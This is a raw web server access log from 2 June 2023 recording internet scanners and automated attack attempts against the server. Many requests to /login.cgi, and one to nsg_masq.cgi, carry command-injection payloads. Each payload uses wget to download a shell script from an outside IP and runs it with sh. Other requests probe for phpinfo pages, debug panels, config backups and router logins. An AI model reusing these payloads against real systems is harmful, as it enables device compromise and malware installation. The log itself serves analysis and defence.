103.116.52.89 - - [02/Jun/2023:00:19:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
47.88.5.56 - - [02/Jun/2023:00:23:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"
47.88.93.234 - - [02/Jun/2023:00:23:56 +0200] "GET /Public/home/js/check.js HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"
47.88.93.234 - - [02/Jun/2023:00:23:57 +0200] "GET /static/admin/javascript/hetong.js HTTP/1.1" 404 338 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"
23.251.102.74 - - [02/Jun/2023:00:25:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
128.14.141.34 - - [02/Jun/2023:00:27:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
59.3.10.156 - - [02/Jun/2023:00:32:36 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
109.205.213.39 - - [02/Jun/2023:00:33:15 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
45.128.232.62 - - [02/Jun/2023:00:34:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
128.14.134.170 - - [02/Jun/2023:00:42:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:00:49:17 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
154.26.135.81 - - [02/Jun/2023:00:49:17 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:00:49:18 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:00:49:19 +0200] "POST /debug/default/view?panel=config HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:00:49:19 +0200] "POST /tool/view/phpinfo.view.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:00:49:20 +0200] "POST /wp-config.php-backup HTTP/1.1" 404 325 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:00:49:20 +0200] "POST /%C0 HTTP/1.1" 404 306 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:00:49:21 +0200] "POST /debug/default/view.html HTTP/1.1" 404 328 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:00:49:22 +0200] "POST /debug/default/view HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:00:49:22 +0200] "POST /frontend/web/debug/default/view HTTP/1.1" 404 336 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:00:49:23 +0200] "POST /web/debug/default/view HTTP/1.1" 404 327 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:00:49:24 +0200] "POST /sapi/debug/default/view HTTP/1.1" 404 328 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:00:49:25 +0200] "POST /debug/default/view?panel=config HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
198.235.24.183 - - [02/Jun/2023:00:52:57 +0200] "\x16\x03\x01" 501 318 "-" "-"
151.235.54.88 - - [02/Jun/2023:00:55:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
185.177.57.157 - - [02/Jun/2023:00:57:20 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.83:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
3.144.84.231 - - [02/Jun/2023:00:59:07 +0200] "GET /admin/.svn/wc.db HTTP/1.1" 404 321 "-" "DoCoMo/2.0 SH901iC(c100;TB;W24H12)"
87.236.176.109 - - [02/Jun/2023:01:04:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
59.24.112.25 - - [02/Jun/2023:01:05:42 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
109.205.213.4 - - [02/Jun/2023:01:08:31 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
210.213.201.140 - - [02/Jun/2023:01:10:10 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.58.0"
109.205.213.106 - - [02/Jun/2023:01:15:02 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
128.1.248.42 - - [02/Jun/2023:01:19:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
109.205.213.10 - - [02/Jun/2023:01:20:15 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
109.205.213.10 - - [02/Jun/2023:01:20:40 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
109.205.213.104 - - [02/Jun/2023:01:21:24 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
190.212.140.11 - - [02/Jun/2023:01:21:59 +0200] "POST /mgmt/tm/util/bash HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
190.212.140.11 - - [02/Jun/2023:01:21:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "curl/7.58.0"
35.203.211.53 - - [02/Jun/2023:01:25:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
109.205.213.4 - - [02/Jun/2023:01:27:36 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
35.203.211.183 - - [02/Jun/2023:01:30:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
198.235.24.236 - - [02/Jun/2023:01:35:38 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
45.128.232.62 - - [02/Jun/2023:01:41:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
35.203.211.138 - - [02/Jun/2023:01:54:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
109.205.213.41 - - [02/Jun/2023:01:55:31 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
193.118.53.194 - - [02/Jun/2023:01:55:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:01:58:08 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:01:58:08 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
154.26.135.81 - - [02/Jun/2023:01:58:09 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:01:58:09 +0200] "POST /debug/default/view?panel=config HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:01:58:10 +0200] "POST /tool/view/phpinfo.view.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:01:58:11 +0200] "POST /wp-config.php-backup HTTP/1.1" 404 325 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:01:58:12 +0200] "POST /%C0 HTTP/1.1" 404 306 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:01:58:13 +0200] "POST /debug/default/view.html HTTP/1.1" 404 328 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:01:58:14 +0200] "POST /debug/default/view HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:01:58:14 +0200] "POST /frontend/web/debug/default/view HTTP/1.1" 404 336 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:01:58:15 +0200] "POST /web/debug/default/view HTTP/1.1" 404 327 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:01:58:15 +0200] "POST /sapi/debug/default/view HTTP/1.1" 404 328 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:01:58:16 +0200] "POST /debug/default/view?panel=config HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
194.165.16.76 - - [02/Jun/2023:02:03:27 +0200] "\x03" 501 316 "-" "-"
185.53.144.104 - - [02/Jun/2023:02:05:00 +0200] "GET /cgi-bin/network_config/nsg_masq.cgi?user_name=admin&session_id=../&lang=zh_CN.UTF-8&act=2&proto=;wget http://163.123.143.126/netlog.sh; sh netlog.sh>/usr/local/lyx/lyxcenter/web/lol.html; HTTP/1.1 HTTP/1.1" 404 336 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
205.210.31.76 - - [02/Jun/2023:02:12:13 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
45.66.230.201 - - [02/Jun/2023:02:12:42 +0200] "" 501 315 "-" "-"
109.205.213.104 - - [02/Jun/2023:02:27:44 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
185.177.57.157 - - [02/Jun/2023:02:33:56 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.84:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
167.248.133.33 - - [02/Jun/2023:02:34:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.33 - - [02/Jun/2023:02:34:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.33 - - [02/Jun/2023:02:34:49 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.33 - - [02/Jun/2023:02:34:49 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
109.205.213.10 - - [02/Jun/2023:02:49:36 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
109.205.213.38 - - [02/Jun/2023:03:00:34 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
45.128.232.62 - - [02/Jun/2023:03:00:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
198.235.24.94 - - [02/Jun/2023:03:01:48 +0200] "\x16\x03\x01" 501 318 "-" "-"
109.205.213.103 - - [02/Jun/2023:03:03:19 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
185.177.57.157 - - [02/Jun/2023:03:05:18 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.87:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
128.1.248.42 - - [02/Jun/2023:03:05:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
188.166.65.47 - - [02/Jun/2023:03:05:51 +0200] "\x16\x03\x01" 501 318 "-" "-"
188.166.65.47 - - [02/Jun/2023:03:05:51 +0200] "\x16\x03\x01" 501 318 "-" "-"
188.166.65.47 - - [02/Jun/2023:03:05:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
188.166.65.47 - - [02/Jun/2023:03:05:51 +0200] "GET /client/get_targets HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
188.166.65.47 - - [02/Jun/2023:03:05:51 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
188.166.65.47 - - [02/Jun/2023:03:05:51 +0200] "\x16\x03\x01" 501 318 "-" "-"
188.166.65.47 - - [02/Jun/2023:03:05:51 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
188.166.65.47 - - [02/Jun/2023:03:05:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Snapchat/10.77.0.54 (like Safari/604.1)"
188.166.65.47 - - [02/Jun/2023:03:05:52 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
188.166.65.47 - - [02/Jun/2023:03:05:52 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
188.166.65.47 - - [02/Jun/2023:03:05:52 +0200] "GET /bundle.js HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
152.228.243.2 - - [02/Jun/2023:03:09:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0"
198.235.24.165 - - [02/Jun/2023:03:11:47 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
109.205.213.104 - - [02/Jun/2023:03:12:31 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
167.248.133.127 - - [02/Jun/2023:03:13:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.127 - - [02/Jun/2023:03:13:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.127 - - [02/Jun/2023:03:13:24 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.127 - - [02/Jun/2023:03:13:24 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
45.66.230.201 - - [02/Jun/2023:03:13:38 +0200] "" 501 315 "-" "-"
205.210.31.36 - - [02/Jun/2023:03:15:33 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
45.128.232.62 - - [02/Jun/2023:03:20:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
109.205.213.43 - - [02/Jun/2023:03:22:57 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
54.162.12.76 - - [02/Jun/2023:03:31:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/56.0.3098.103 Safari/537.32"
72.10.198.197 - - [02/Jun/2023:03:31:58 +0200] "POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1" 400 406 "-" "-"
195.144.21.56 - - [02/Jun/2023:03:32:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
195.144.21.56 - - [02/Jun/2023:03:32:23 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
195.144.21.56 - - [02/Jun/2023:03:32:23 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
195.144.21.56 - - [02/Jun/2023:03:32:23 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
195.144.21.56 - - [02/Jun/2023:03:32:24 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0"
109.205.213.5 - - [02/Jun/2023:03:34:32 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
109.205.213.43 - - [02/Jun/2023:03:34:36 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
205.210.31.169 - - [02/Jun/2023:03:47:09 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
109.205.213.39 - - [02/Jun/2023:03:49:07 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
3.250.240.251 - - [02/Jun/2023:03:50:25 +0200] "HEAD /spicons/apache_pb.gif HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
109.205.213.38 - - [02/Jun/2023:03:51:03 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
109.205.213.104 - - [02/Jun/2023:03:52:19 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
109.205.213.108 - - [02/Jun/2023:03:59:39 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
45.128.232.62 - - [02/Jun/2023:04:07:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
185.177.57.157 - - [02/Jun/2023:04:12:32 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.81:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
45.128.232.62 - - [02/Jun/2023:04:12:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
45.66.230.201 - - [02/Jun/2023:04:18:26 +0200] "" 501 315 "-" "-"
144.137.212.146 - - [02/Jun/2023:04:23:23 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
205.210.31.46 - - [02/Jun/2023:04:24:40 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.79.181.179 - - [02/Jun/2023:04:39:05 +0200] "\x16\x03\x01" 501 318 "-" "-"
94.102.61.10 - - [02/Jun/2023:04:42:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
172.104.11.4 - - [02/Jun/2023:04:42:23 +0200] "\x16\x03\x01" 501 318 "-" "-"
94.102.61.10 - - [02/Jun/2023:04:43:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
94.102.61.10 - - [02/Jun/2023:04:44:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
94.102.61.10 - - [02/Jun/2023:04:44:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
94.102.61.10 - - [02/Jun/2023:04:46:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
94.102.61.10 - - [02/Jun/2023:04:46:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
192.155.90.220 - - [02/Jun/2023:04:47:02 +0200] "\x16\x03\x01" 501 318 "-" "-"
94.102.61.10 - - [02/Jun/2023:04:47:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
94.102.61.10 - - [02/Jun/2023:04:47:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
94.102.61.10 - - [02/Jun/2023:04:47:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
